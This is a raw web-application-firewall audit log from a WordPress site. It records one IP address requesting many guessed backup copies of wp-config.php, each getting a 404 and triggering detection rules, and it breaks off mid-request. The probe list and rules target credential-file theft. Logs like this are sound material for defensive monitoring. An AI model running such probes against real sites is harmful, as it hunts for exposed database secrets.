ModSecurity: Warning. Matched phrase "wp-config.bak" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/wp-config.bak"] [unique_id "aE3pFm1_24bael5AsqHJBQAAAAo"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.evofoot.in"] [uri "/wp-config.bak"] [unique_id "aE3pFm1_24bael5AsqHJBQAAAAo"] Stopwatch: 1749936406094700 3145 (- - -) Stopwatch2: 1749936406094700 3145; combined=1877, p1=365, p2=1434, p3=0, p4=0, p5=78, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --73751163-Z-- --57db8460-A-- [15/Jun/2025:02:56:46.337918 +0530] aE3pFtlaOcxgn8EdjwOwDwAAAAc 185.177.72.108 60812 127.0.0.1 7080 --57db8460-B-- GET /wp-config.php-bak HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --57db8460-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --57db8460-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/wp-config.php-bak"] [unique_id "aE3pFtlaOcxgn8EdjwOwDwAAAAc"] Stopwatch: 1749936406334803 3169 (- - -) Stopwatch2: 1749936406334803 3169; combined=1902, p1=361, p2=1484, p3=0, p4=0, p5=57, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --57db8460-Z-- --6b6fa03e-A-- [15/Jun/2025:02:56:46.448501 +0530] aE3pFuQxpfcsz2uNnR-jtwAAAAI 185.177.72.108 60822 127.0.0.1 7080 --6b6fa03e-B-- GET /wp-config.php.0 HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --6b6fa03e-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --6b6fa03e-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/wp-config.php.0"] [unique_id "aE3pFuQxpfcsz2uNnR-jtwAAAAI"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/evofoot.in/httpdocs/wp-config.php.0' not found or unable to stat Stopwatch: 1749936406445491 3065 (- - -) Stopwatch2: 1749936406445491 3065; combined=1751, p1=381, p2=1278, p3=0, p4=0, p5=91, sr=89, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6b6fa03e-Z-- --1a2d0e22-A-- [15/Jun/2025:02:56:46.558653 +0530] aE3pFiQOy0yoNZQ7dslNrAAAAAk 185.177.72.108 60836 127.0.0.1 7080 --1a2d0e22-B-- GET /wp-config.php.1 HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --1a2d0e22-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --1a2d0e22-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/wp-config.php.1"] [unique_id "aE3pFiQOy0yoNZQ7dslNrAAAAAk"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/evofoot.in/httpdocs/wp-config.php.1' not found or unable to stat Stopwatch: 1749936406555663 3044 (- - -) Stopwatch2: 1749936406555663 3044; combined=1776, p1=339, p2=1378, p3=0, p4=0, p5=59, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1a2d0e22-Z-- --5ee68e2b-A-- [15/Jun/2025:02:56:46.670321 +0530] aE3pFp4hb3-ZG-auIyDOOAAAAAg 185.177.72.108 60848 127.0.0.1 7080 --5ee68e2b-B-- GET /wp-config.php.2 HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --5ee68e2b-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --5ee68e2b-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/wp-config.php.2"] [unique_id "aE3pFp4hb3-ZG-auIyDOOAAAAAg"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/evofoot.in/httpdocs/wp-config.php.2' not found or unable to stat Stopwatch: 1749936406666007 4389 (- - -) Stopwatch2: 1749936406666007 4389; combined=2644, p1=545, p2=2006, p3=0, p4=0, p5=92, sr=136, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5ee68e2b-Z-- --0f5ca63e-A-- [15/Jun/2025:02:56:46.781365 +0530] aE3pFm1_24bael5AsqHJBgAAAAo 185.177.72.108 60860 127.0.0.1 7080 --0f5ca63e-B-- GET /wp-config.php.3 HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --0f5ca63e-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --0f5ca63e-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/wp-config.php.3"] [unique_id "aE3pFm1_24bael5AsqHJBgAAAAo"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/evofoot.in/httpdocs/wp-config.php.3' not found or unable to stat Stopwatch: 1749936406777684 3769 (- - -) Stopwatch2: 1749936406777684 3769; combined=2234, p1=463, p2=1687, p3=0, p4=0, p5=84, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0f5ca63e-Z-- --d1cdf66e-A-- [15/Jun/2025:02:56:47.316961 +0530] aE3pFzpSduy_dUF9ffnDwwAAAAU 185.177.72.108 60868 127.0.0.1 7080 --d1cdf66e-B-- GET /wp-config.php.4 HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --d1cdf66e-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --d1cdf66e-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/wp-config.php.4"] [unique_id "aE3pFzpSduy_dUF9ffnDwwAAAAU"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/evofoot.in/httpdocs/wp-config.php.4' not found or unable to stat Stopwatch: 1749936407225253 91785 (- - -) Stopwatch2: 1749936407225253 91785; combined=178220, p1=505, p2=1679, p3=0, p4=0, p5=88053, sr=114, sw=0, l=0, gc=87983 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d1cdf66e-Z-- --bfa29c20-A-- [15/Jun/2025:02:56:47.345281 +0530] aE3pF9laOcxgn8EdjwOwEAAAAAc 185.177.72.108 60872 127.0.0.1 7080 --bfa29c20-B-- GET /wp-config.php.5 HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --bfa29c20-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --bfa29c20-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/wp-config.php.5"] [unique_id "aE3pF9laOcxgn8EdjwOwEAAAAAc"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/evofoot.in/httpdocs/wp-config.php.5' not found or unable to stat Stopwatch: 1749936407341531 3826 (- - -) Stopwatch2: 1749936407341531 3826; combined=2254, p1=473, p2=1703, p3=0, p4=0, p5=78, sr=124, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --bfa29c20-Z-- --4ae3cf0b-A-- [15/Jun/2025:02:56:47.455669 +0530] aE3pF-Qxpfcsz2uNnR-juAAAAAI 185.177.72.108 60876 127.0.0.1 7080 --4ae3cf0b-B-- GET /wp-config.php.6 HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --4ae3cf0b-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --4ae3cf0b-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/wp-config.php.6"] [unique_id "aE3pF-Qxpfcsz2uNnR-juAAAAAI"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/evofoot.in/httpdocs/wp-config.php.6' not found or unable to stat Stopwatch: 1749936407452593 3130 (- - -) Stopwatch2: 1749936407452593 3130; combined=1851, p1=369, p2=1420, p3=0, p4=0, p5=62, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4ae3cf0b-Z-- --d803d963-A-- [15/Jun/2025:02:56:47.565675 +0530] aE3pFyQOy0yoNZQ7dslNrQAAAAk 185.177.72.108 60882 127.0.0.1 7080 --d803d963-B-- GET /wp-config.php.7 HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --d803d963-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --d803d963-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/wp-config.php.7"] [unique_id "aE3pFyQOy0yoNZQ7dslNrQAAAAk"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/evofoot.in/httpdocs/wp-config.php.7' not found or unable to stat Stopwatch: 1749936407562848 2880 (- - -) Stopwatch2: 1749936407562848 2880; combined=1673, p1=323, p2=1284, p3=0, p4=0, p5=66, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d803d963-Z-- --6de90202-A-- [15/Jun/2025:02:56:47.959074 +0530] aE3pF-Xds7bzDL-AINRY0wAAAAM 185.177.72.108 60896 127.0.0.1 7080 --6de90202-B-- GET /wp-config.php.8 HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --6de90202-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --6de90202-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/wp-config.php.8"] [unique_id "aE3pF-Xds7bzDL-AINRY0wAAAAM"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/evofoot.in/httpdocs/wp-config.php.8' not found or unable to stat Stopwatch: 1749936407955280 3860 (- - -) Stopwatch2: 1749936407955280 3860; combined=2270, p1=476, p2=1721, p3=0, p4=0, p5=73, sr=131, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6de90202-Z-- --fd54b067-A-- [15/Jun/2025:02:56:48.069436 +0530] aE3pGG1_24bael5AsqHJBwAAAAo 185.177.72.108 60910 127.0.0.1 7080 --fd54b067-B-- GET /wp-config.php.9 HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --fd54b067-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --fd54b067-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/wp-config.php.9"] [unique_id "aE3pGG1_24bael5AsqHJBwAAAAo"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/evofoot.in/httpdocs/wp-config.php.9' not found or unable to stat Stopwatch: 1749936408066350 3141 (- - -) Stopwatch2: 1749936408066350 3141; combined=1783, p1=429, p2=1290, p3=0, p4=0, p5=64, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fd54b067-Z-- --33e87b64-A-- [15/Jun/2025:02:56:48.179894 +0530] aE3pGNlaOcxgn8EdjwOwEQAAAAc 185.177.72.108 60924 127.0.0.1 7080 --33e87b64-B-- GET /wp-config.php.backup HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --33e87b64-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --33e87b64-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".php.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/wp-config.php.backup"] [unique_id "aE3pGNlaOcxgn8EdjwOwEQAAAAc"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.evofoot.in|F|2"] [data ".php.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.evofoot.in"] [uri "/wp-config.php.backup"] [unique_id "aE3pGNlaOcxgn8EdjwOwEQAAAAc"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/evofoot.in/httpdocs/wp-config.php.backup' not found or unable to stat Stopwatch: 1749936408176835 3123 (- - -) Stopwatch2: 1749936408176835 3123; combined=1789, p1=467, p2=1239, p3=0, p4=0, p5=83, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --33e87b64-Z-- --81730c51-A-- [15/Jun/2025:02:56:48.299399 +0530] aE3pGOQxpfcsz2uNnR-juQAAAAI 185.177.72.108 60928 127.0.0.1 7080 --81730c51-B-- GET /wp-config.php.bak1 HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --81730c51-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --81730c51-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/wp-config.php.bak1"] [unique_id "aE3pGOQxpfcsz2uNnR-juQAAAAI"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/evofoot.in/httpdocs/wp-config.php.bak1' not found or unable to stat Stopwatch: 1749936408296122 3331 (- - -) Stopwatch2: 1749936408296122 3331; combined=2013, p1=421, p2=1500, p3=0, p4=0, p5=92, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --81730c51-Z-- --a43ec35f-A-- [15/Jun/2025:02:56:48.409848 +0530] aE3pGNAcUP5X8o425y3XEQAAAAQ 185.177.72.108 60930 127.0.0.1 7080 --a43ec35f-B-- GET /wp-config.php.bk HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --a43ec35f-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 05:51:27 GMT ETag: "328-623b460ef8f1f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --a43ec35f-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.evofoot.in"] [uri "/wp-config.php.bk"] [unique_id "aE3pGNAcUP5X8o425y3XEQAAAAQ"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/evofoot.in/httpdocs/wp-config.php.bk' not found or unable to stat Stopwatch: 1749936408406707 3206 (- - -) Stopwatch2: 1749936408406707 3206; combined=1925, p1=376, p2=1490, p3=0, p4=0, p5=59, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a43ec35f-Z-- --2239d36a-A-- [15/Jun/2025:02:56:48.522190 +0530] aE3pGCQOy0yoNZQ7dslNrgAAAAk 185.177.72.108 60942 127.0.0.1 7080 --2239d36a-B-- GET /wp-config.php.cust HTTP/1.0 Host: www.evofoot.in X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 